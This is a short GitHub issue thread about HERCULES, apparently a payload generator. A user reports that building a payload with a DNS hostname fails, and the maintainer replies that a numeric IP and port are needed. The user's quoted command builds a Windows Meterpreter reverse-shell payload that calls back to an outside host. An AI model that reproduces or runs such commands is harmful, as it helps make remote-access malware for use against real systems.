### ISSUE TITLE
Missing DNS support

### ISSUE THREAD

**Issue by LikeZer0** [EgeBalci/HERCULES#4]
Hi,

I tried to compile the payload using a DNS address but it returns me an 'Invalid IP address' error.
I launched the following command: ./HERCULES example.mydns.net 443 -p windows/meterpreter/reverse_tcp_dns -a x86 -l dynamic

**Comment by EgeBalci** [comment]
Hi,
You need to give the address as a numeric ip format, like `127.0.0.1:3333`, you can find out your dns addresses ip [here](http://get-site-ip.com/), and be careful whit your syntax you need to put `:` between your ip and port.
